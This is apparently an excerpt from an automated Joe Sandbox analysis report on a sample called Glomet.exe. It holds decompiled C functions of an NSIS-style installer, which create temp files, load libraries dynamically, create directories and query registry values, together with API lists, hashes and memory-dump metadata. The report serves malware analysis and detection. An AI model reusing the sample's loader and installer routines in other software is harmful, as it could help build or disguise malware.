                                                                                                                                                                              • Opcode Fuzzy Hash: e7bab2dcec296759a74a33424807f7fed87e27b7007b4ae7814fd3a0996a0b2c
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E119371E04208BFEB20AFA59E49AAE7A74EB44714F21443FF504F71C1D6B94D409B68
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 775 405e19-405e23 776 405e24-405e4f GetTickCount GetTempFileNameA 775->776 777 405e51-405e53 776->777 778 405e5e-405e60 776->778 777->776 779 405e55 777->779 780 405e58-405e5b 778->780 779->780
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405E19(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                                                                              				char _t11;
                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                              				int _t15;
                                                                                                                                                                              				signed int _t17;
                                                                                                                                                                              				void* _t20;
                                                                                                                                                                              				CHAR* _t21;
                                                                                                                                                                              
                                                                                                                                                                              				_t21 = _a4;
                                                                                                                                                                              				_t20 = 0x64;
                                                                                                                                                                              				while(1) {
                                                                                                                                                                              					_t11 =  *0x40a3d4; // 0x61736e
                                                                                                                                                                              					_t20 = _t20 - 1;
                                                                                                                                                                              					_a4 = _t11;
                                                                                                                                                                              					_t12 = GetTickCount();
                                                                                                                                                                              					_t17 = 0x1a;
                                                                                                                                                                              					_a6 = _a6 + _t12 % _t17;
                                                                                                                                                                              					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                                                                                                              					if(_t15 != 0) {
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                              						continue;
                                                                                                                                                                              					}
                                                                                                                                                                              					 *_t21 =  *_t21 & 0x00000000;
                                                                                                                                                                              					return _t15;
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t21;
                                                                                                                                                                              			}










                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405E2D
                                                                                                                                                                              • GetTempFileNameA.KERNELBASE(0000000B,?,00000000,?,?,004033B1,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007), ref: 00405E47
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                              • API String ID: 1716503409-1968954121
                                                                                                                                                                              • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                                              • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                                              • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                              			E004020A5(void* __ebx, void* __eflags) {
                                                                                                                                                                              				struct HINSTANCE__* _t18;
                                                                                                                                                                              				struct HINSTANCE__* _t26;
                                                                                                                                                                              				void* _t27;
                                                                                                                                                                              				struct HINSTANCE__* _t30;
                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                              				void* _t34;
                                                                                                                                                                              
                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                              				asm("sbb eax, 0x42f4e0");
                                                                                                                                                                              				 *(_t34 - 4) = 1;
                                                                                                                                                                              				if(__eflags < 0) {
                                                                                                                                                                              					_push(0xffffffe7);
                                                                                                                                                                              					L15:
                                                                                                                                                                              					E00401423();
                                                                                                                                                                              					L16:
                                                                                                                                                                              					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t32 = E00402C39(0xfffffff0);
                                                                                                                                                                              				 *(_t34 + 8) = E00402C39(1);
                                                                                                                                                                              				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                                                                                                              					L3:
                                                                                                                                                                              					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                                                                                                              					_t30 = _t18;
                                                                                                                                                                              					if(_t30 == _t27) {
                                                                                                                                                                              						_push(0xfffffff6);
                                                                                                                                                                              						goto L15;
                                                                                                                                                                              					}
                                                                                                                                                                              					L4:
                                                                                                                                                                              					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                                                                              					if(_t33 == _t27) {
                                                                                                                                                                              						E00405378(0xfffffff7,  *(_t34 + 8));
                                                                                                                                                                              					} else {
                                                                                                                                                                              						 *(_t34 - 4) = _t27;
                                                                                                                                                                              						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                                                                                                              							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000);
                                                                                                                                                                              						} else {
                                                                                                                                                                              							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                                                                                                              							if( *_t33() != 0) {
                                                                                                                                                                              								 *(_t34 - 4) = 1;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DD(_t30) != 0) {
                                                                                                                                                                              						FreeLibrary(_t30);
                                                                                                                                                                              					}
                                                                                                                                                                              					goto L16;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t26 = GetModuleHandleA(_t32); // executed
                                                                                                                                                                              				_t30 = _t26;
                                                                                                                                                                              				if(_t30 != __ebx) {
                                                                                                                                                                              					goto L4;
                                                                                                                                                                              				}
                                                                                                                                                                              				goto L3;
                                                                                                                                                                              			}











                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                                                                                                                                • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30), ref: 004053D4
                                                                                                                                                                                • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 004053E6
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004020F0
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040215A
Memory Dump Source
• Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2987980305-0
                                                                                                                                                                              • Opcode ID: c2b3ecd03a149f651ebeb28022e50585e6a1415636be2ecdb2c0b4a3a556a140
                                                                                                                                                                              • Instruction ID: 3c6328a696446079fc2d308fbd04895e9a1cd4fdde8666fe7d5c2d170abc5611
                                                                                                                                                                              • Opcode Fuzzy Hash: c2b3ecd03a149f651ebeb28022e50585e6a1415636be2ecdb2c0b4a3a556a140
                                                                                                                                                                              • Instruction Fuzzy Hash: 7721F631904215E7CF207FA58F4DAAF3670AF54358F60423BF601B61E0DAFD49819A6E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                              			E004015BB(char __ebx, void* __eflags) {
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              				int _t19;
                                                                                                                                                                              				char _t21;
                                                                                                                                                                              				void* _t22;
                                                                                                                                                                              				char _t23;
                                                                                                                                                                              				signed char _t24;
                                                                                                                                                                              				char _t26;
                                                                                                                                                                              				CHAR* _t28;
                                                                                                                                                                              				char* _t32;
                                                                                                                                                                              				void* _t33;
                                                                                                                                                                              
                                                                                                                                                                              				_t26 = __ebx;
                                                                                                                                                                              				_t28 = E00402C39(0xfffffff0);
                                                                                                                                                                              				_t13 = E00405C82(_t28);
                                                                                                                                                                              				_t30 = _t13;
                                                                                                                                                                              				if(_t13 != __ebx) {
                                                                                                                                                                              					do {
                                                                                                                                                                              						_t32 = E00405C14(_t30, 0x5c);
                                                                                                                                                                              						_t21 =  *_t32;
                                                                                                                                                                              						 *_t32 = _t26;
                                                                                                                                                                              						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                                                                                                              						if(_t21 != _t26) {
                                                                                                                                                                              							L5:
                                                                                                                                                                              							_t22 = E004058BB(_t28);
                                                                                                                                                                              						} else {
                                                                                                                                                                              							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                                                                                                              							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D8(_t39) == 0) {
                                                                                                                                                                              								goto L5;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								_t22 = E0040583E(_t28); // executed
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						if(_t22 != _t26) {
                                                                                                                                                                              							if(_t22 != 0xb7) {
                                                                                                                                                                              								L9:
                                                                                                                                                                              								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                                                                                              								if((_t24 & 0x00000010) == 0) {
                                                                                                                                                                              									goto L9;
                                                                                                                                                                              								}
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                                                                                              						 *_t32 = _t23;
                                                                                                                                                                              						_t30 = _t32 + 1;
                                                                                                                                                                              					} while (_t23 != _t26);
                                                                                                                                                                              				}
                                                                                                                                                                              				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                                                                                                              					_push(0xfffffff5);
                                                                                                                                                                              					E00401423();
                                                                                                                                                                              				} else {
                                                                                                                                                                              					E00401423(0xffffffe6);
                                                                                                                                                                              					E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1", _t28);
                                                                                                                                                                              					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                                                                                                              					if(_t19 == 0) {
                                                                                                                                                                              						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}














                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405C90
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1, xrefs: 00401631
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                              • String ID: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1
                                                                                                                                                                              • API String ID: 1892508949-3951930202
                                                                                                                                                                              • Opcode ID: 1d08fccf013ae01466d21f2db869ba298c67a8c3c420c2a747c013d99e6cef01
                                                                                                                                                                              • Instruction ID: 7a2b8dfd757742e83ffe6dd7df5b12a9f5db33ee71018b299411addc72821366
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d08fccf013ae01466d21f2db869ba298c67a8c3c420c2a747c013d99e6cef01
                                                                                                                                                                              • Instruction Fuzzy Hash: 54110431508141EBDF307BA54D409BF27B49A96324B68453FF9D1B22E2DA3D4942AA3E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                              			E0040613E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                                                                                                              				int _v8;
                                                                                                                                                                              				long _t21;
                                                                                                                                                                              				long _t24;
                                                                                                                                                                              				char* _t30;
                                                                                                                                                                              
                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                              				_v8 = 0x400;
                                                                                                                                                                              				_t21 = E004060DD(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                                                                                              				_t30 = _a16;
                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                              					L4:
                                                                                                                                                                              					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                                                                                                                              					_t21 = RegCloseKey(_a20); // executed
                                                                                                                                                                              					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                                                                                                              					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                                                                              						goto L4;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t21;
                                                                                                                                                                              			}








                                                                                                                                                                              APIs
                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,ExecToStack,?,?,?,?,00000002,ExecToStack,?,004063F6,80000002), ref: 00406184
                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,004063F6,80000002,Software\Microsoft\Windows\CurrentVersion,ExecToStack,ExecToStack,ExecToStack,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 0040618F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                              • String ID: ExecToStack
                                                                                                                                                                              • API String ID: 3356406503-166031814
                                                                                                                                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                              • Instruction ID: 76517841fcd29efece62e5e1a2c360dd076a242d2a9727e46a6747b1579fdab2
                                                                                                                                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F017C72500209ABDF22CF61CC09FDB3FACEF55364F05803AF956A6192D278D964DBA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                              			E00402590(int* __ebx, intOrPtr __edx, char* __esi) {
                                                                                                                                                                              				void* _t9;
                                                                                                                                                                              				int _t10;
                                                                                                                                                                              				long _t13;
                                                                                                                                                                              				int* _t16;
                                                                                                                                                                              				intOrPtr _t21;
                                                                                                                                                                              				void* _t22;
                                                                                                                                                                              				char* _t24;
                                                                                                                                                                              				void* _t26;
                                                                                                                                                                              				void* _t29;
                                                                                                                                                                              
                                                                                                                                                                              				_t24 = __esi;
                                                                                                                                                                              				_t21 = __edx;
                                                                                                                                                                              				_t16 = __ebx;
                                                                                                                                                                              				_t9 = E00402C79(_t29, 0x20019); // executed
                                                                                                                                                                              				_t22 = _t9;
                                                                                                                                                                              				_t10 = E00402C17(3);
                                                                                                                                                                              				 *((intOrPtr*)(_t26 - 0x38)) = _t21;
                                                                                                                                                                              				 *__esi = __ebx;
                                                                                                                                                                              				if(_t22 == __ebx) {
                                                                                                                                                                              					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					 *(_t26 + 8) = 0x3ff;
                                                                                                                                                                              					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                                                                                                                                              						_t13 = RegEnumValueA(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                                                                                              						__eflags = _t13;
                                                                                                                                                                              						if(_t13 != 0) {
                                                                                                                                                                              							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                                                                              						}
                                                                                                                                                                              					} else {
                                                                                                                                                                              						RegEnumKeyA(_t22, _t10, __esi, 0x3ff);
                                                                                                                                                                              					}
                                                                                                                                                                              					_t24[0x3ff] = _t16;
                                                                                                                                                                              					_push(_t22);
                                                                                                                                                                              					RegCloseKey();
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t26 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}













                                                                                                                                                                              APIs
                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C2
                                                                                                                                                                              • RegEnumValueA.ADVAPI32 ref: 004025D5
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 004025ED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Enum$CloseValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 397863658-0
                                                                                                                                                                              • Opcode ID: d162c76e602d6482854cfea5e60dbc05a44eb58883d3af9fb6a1c0528d5cc1b7
                                                                                                                                                                              • Instruction ID: 05a6338ea728e2eb0a325d4f1a93e0922101b3b1b3b6e4bdb5826db2e5b3ed57
                                                                                                                                                                              • Opcode Fuzzy Hash: d162c76e602d6482854cfea5e60dbc05a44eb58883d3af9fb6a1c0528d5cc1b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 88017571904104FFE7159F549E88ABF7B6CEB41358F20443EF101A61C0DAB44E449679
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                              			E0040251E(int* __ebx, char* __esi) {
                                                                                                                                                                              				void* _t17;
                                                                                                                                                                              				char* _t18;
                                                                                                                                                                              				void* _t33;
                                                                                                                                                                              				void* _t37;
                                                                                                                                                                              				void* _t40;
                                                                                                                                                                              
                                                                                                                                                                              				_t35 = __esi;
                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                              				_t17 = E00402C79(_t40, 0x20019); // executed
                                                                                                                                                                              				_t33 = _t17;
                                                                                                                                                                              				_t18 = E00402C39(0x33);
                                                                                                                                                                              				 *__esi = __ebx;
                                                                                                                                                                              				if(_t33 == __ebx) {
                                                                                                                                                                              					 *(_t37 - 4) = 1;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					 *(_t37 - 0x38) = 0x400;
                                                                                                                                                                              					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x38) != 0) {
                                                                                                                                                                              						L7:
                                                                                                                                                                              						 *_t35 = _t27;
                                                                                                                                                                              						 *(_t37 - 4) = 1;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						if( *(_t37 + 8) == 4) {
                                                                                                                                                                              							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                                                                                                                              							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                                                                                                                              							E004061B5(__esi,  *__esi);
                                                                                                                                                                              						} else {
                                                                                                                                                                              							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                                                                                              								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                                                                                                                              								_t35[0x3ff] = _t27;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								goto L7;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              					_push(_t33);
                                                                                                                                                                              					RegCloseKey();
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}








                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040254E
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 004025ED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                                                              • Opcode ID: d5f2437c19de5f7167ed681dec8eeca0f91e5fcafd86e9c866d4406102cdea3d
                                                                                                                                                                              • Instruction ID: 02260f91894b81efdf071d6bf66139ec23fd99d5adfc3060dafb801450c89547
